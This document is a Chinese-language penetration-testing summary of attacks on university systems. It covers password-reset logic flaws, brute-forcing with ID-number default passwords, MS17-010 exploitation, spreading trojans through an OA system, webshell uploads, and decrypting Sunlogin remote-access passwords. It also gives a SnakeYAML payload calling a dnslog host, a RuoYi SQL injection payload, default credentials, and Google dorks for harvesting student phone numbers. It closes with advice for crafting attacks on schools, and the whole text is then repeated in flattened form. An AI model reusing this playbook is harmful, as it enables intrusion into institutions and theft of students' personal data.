教育行业渗透测试技术总结

1. OA系统密码找回漏洞利用

1.1 密码找回流程

在系统使用说明文档中发现登录账号(如600030)
选择"密保问题"找回方式
问题选择"出生地"，答案填写高校所在地
成功修改密码后可获得图文信息中心身份权限

1.2 后续利用

获取1400+学生敏感信息(手机号、身份证号、学号)
组合密码本进行统一身份认证系统爆破(默认密码为身份证后六位)
登录VPN进行内网扫描
利用MS17010漏洞获取C段多台主机权限
通过OA系统通讯功能散播木马

2. 逻辑漏洞修改密码

2.1 GitHub密码泄露

发现GitHub泄露的学号密码(账号可能已被禁用)

2.2 获取学号手机号

注册并登录存在注册功能的网站
通过接口获取用户列表：/User/GetUserListByKeyWord
遍历用户ID获取敏感信息：/User/Tip?time61&id=caec35e7-9956-4f68-98bc-e2aee73ebda5&_=1664438691592

2.3 修改密码流程

使用获取的学号进行密码找回
输入手机号，点击获取验证码并抓包
记录回包中的sign值
随意输入验证码，将之前抓取的流量包直接返回
成功跳转到密码设置页面

2.4 后续利用

通过SQL注入获取shell(79个应用中存在aspx站点的SQL注入)

3. GitHub泄露账号密码利用

3.1 信息收集

GitHub搜索："学校域名" + "password"
发现邮箱账号密码

3.2 登录流程

使用泄露密码登录邮箱
获取手机号和身份证号
使用手机号+邮箱密码登录统一门户
跳转至泛微OA，通过文件上传获取shell

4. 向日葵密码读取技术

4.1 heapdump文件泄露

下载heapdump文件
读取mssql账号密码

4.2 向日葵密码解密

定位配置文件：C:\Program Files\Oray\SunLogin\SunloginClient\config.ini
获取参数：
- fastcode(去除第一位字母为本机识别码)
- encry_pwd(加密后的本机验证码)
使用解密工具：https://github.com/wafinfo/Sunflower_get_Password
成功连接目标主机

5. 若依框架漏洞利用

5.1 初始访问

发现若依框架后台
使用默认凭证：admin/admin@123

5.2 定时任务命令执行

org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [ !!java.net.URLClassLoader [[ !!java.net.URL ["ftp://ceshi.bdtmos.dnslog.cn"] ]] ]')

5.3 Shiro反序列化漏洞

使用工具扫描
成功注入内存马
发现历史入侵痕迹(fscan黑客漏扫工具)

5.4 SQL注入漏洞

注入点：/system/role/list
注入payload：

params[dataScope]=and extractvalue(1,concat(0x7e,(select database()),0x7e))

6. FCKeditor文件上传漏洞

扫描发现FCKeditor目录
定位上传目录
上传aspx木马获取shell

7. 任意文件上传漏洞

根据学校名称及域名编排密码本
爆破登录admin账号
通过上传点实现任意文件上传

8. Struts2反序列化漏洞

识别目标网站使用S2框架
使用工具扫描并获取权限
进行内网渗透

9. 逻辑漏洞利用

9.1 短信验证码泄露

找回密码处验证码直接出现在回包中

9.2 信息收集

谷歌语法："XX大学" "手机号" filetype:xls
获取手机号码

9.3 利用流程

使用找回功能修改密码
登录系统发现党务测试系统
获取上千份真实数据(姓名、手机号、学号、身份证等)
使用学号+身份证后六位登录统一服务平台

10. geoserver弱口令利用

8085端口geoserver使用默认凭证：admin/geoserver
通过配置页面获取PostgreSQL密码
使用相同密码尝试连接MySQL数据库
在log表中发现账号和MD5加密密码
8888端口后台使用获取的凭证登录
通过文件上传漏洞获取shell

总结与建议

高校渗透切入点

VPN弱口令：GitHub泄露是重灾区，搜索"学校域名" + "password"
老旧系统：关注aspx站点的SQL注入，大多数后台存在注入
目录扫描：发现各种编辑器漏洞(如ueditor)，注意参数名可能被修改
信息收集：
- 百度/谷歌高级搜索学号文件
- 收集网站使用说明文档(包含密码组成规则)
- 针对管理员账号进行密码编排
社交工程：通过QQ官方群获取敏感文件

关键建议

重视信息收集环节
多尝试默认凭证和弱口令
关注GitHub等代码托管平台的敏感信息泄露
针对教育行业特点(如身份证后六位作为默认密码)制定攻击策略

教育行业渗透测试技术总结 1. OA系统密码找回漏洞利用 1.1 密码找回流程在系统使用说明文档中发现登录账号(如600030) 选择"密保问题"找回方式问题选择"出生地"，答案填写高校所在地成功修改密码后可获得图文信息中心身份权限 1.2 后续利用获取1400+学生敏感信息(手机号、身份证号、学号) 组合密码本进行统一身份认证系统爆破(默认密码为身份证后六位) 登录VPN进行内网扫描利用MS17010漏洞获取C段多台主机权限通过OA系统通讯功能散播木马 2. 逻辑漏洞修改密码 2.1 GitHub密码泄露发现GitHub泄露的学号密码(账号可能已被禁用) 2.2 获取学号手机号注册并登录存在注册功能的网站通过接口获取用户列表： /User/GetUserListByKeyWord 遍历用户ID获取敏感信息： /User/Tip?time61&id=caec35e7-9956-4f68-98bc-e2aee73ebda5&_=1664438691592 2.3 修改密码流程使用获取的学号进行密码找回输入手机号，点击获取验证码并抓包记录回包中的 sign 值随意输入验证码，将之前抓取的流量包直接返回成功跳转到密码设置页面 2.4 后续利用通过SQL注入获取shell(79个应用中存在aspx站点的SQL注入) 3. GitHub泄露账号密码利用 3.1 信息收集 GitHub搜索："学校域名" + "password" 发现邮箱账号密码 3.2 登录流程使用泄露密码登录邮箱获取手机号和身份证号使用手机号+邮箱密码登录统一门户跳转至泛微OA，通过文件上传获取shell 4. 向日葵密码读取技术 4.1 heapdump文件泄露下载heapdump文件读取mssql账号密码 4.2 向日葵密码解密定位配置文件： C:\Program Files\Oray\SunLogin\SunloginClient\config.ini 获取参数： fastcode(去除第一位字母为本机识别码) encry_ pwd(加密后的本机验证码) 使用解密工具：https://github.com/wafinfo/Sunflower_ get_ Password 成功连接目标主机 5. 若依框架漏洞利用 5.1 初始访问发现若依框架后台使用默认凭证：admin/admin@123 5.2 定时任务命令执行 5.3 Shiro反序列化漏洞使用工具扫描成功注入内存马发现历史入侵痕迹(fscan黑客漏扫工具) 5.4 SQL注入漏洞注入点： /system/role/list 注入payload： 6. FCKeditor文件上传漏洞扫描发现FCKeditor目录定位上传目录上传aspx木马获取shell 7. 任意文件上传漏洞根据学校名称及域名编排密码本爆破登录admin账号通过上传点实现任意文件上传 8. Struts2反序列化漏洞识别目标网站使用S2框架使用工具扫描并获取权限进行内网渗透 9. 逻辑漏洞利用 9.1 短信验证码泄露找回密码处验证码直接出现在回包中 9.2 信息收集谷歌语法： "XX大学" "手机号" filetype:xls 获取手机号码 9.3 利用流程使用找回功能修改密码登录系统发现党务测试系统获取上千份真实数据(姓名、手机号、学号、身份证等) 使用学号+身份证后六位登录统一服务平台 10. geoserver弱口令利用 8085端口geoserver使用默认凭证：admin/geoserver 通过配置页面获取PostgreSQL密码使用相同密码尝试连接MySQL数据库在log表中发现账号和MD5加密密码 8888端口后台使用获取的凭证登录通过文件上传漏洞获取shell 总结与建议高校渗透切入点 VPN弱口令：GitHub泄露是重灾区，搜索"学校域名" + "password" 老旧系统：关注aspx站点的SQL注入，大多数后台存在注入目录扫描：发现各种编辑器漏洞(如ueditor)，注意参数名可能被修改信息收集：百度/谷歌高级搜索学号文件收集网站使用说明文档(包含密码组成规则) 针对管理员账号进行密码编排社交工程：通过QQ官方群获取敏感文件关键建议重视信息收集环节多尝试默认凭证和弱口令关注GitHub等代码托管平台的敏感信息泄露针对教育行业特点(如身份证后六位作为默认密码)制定攻击策略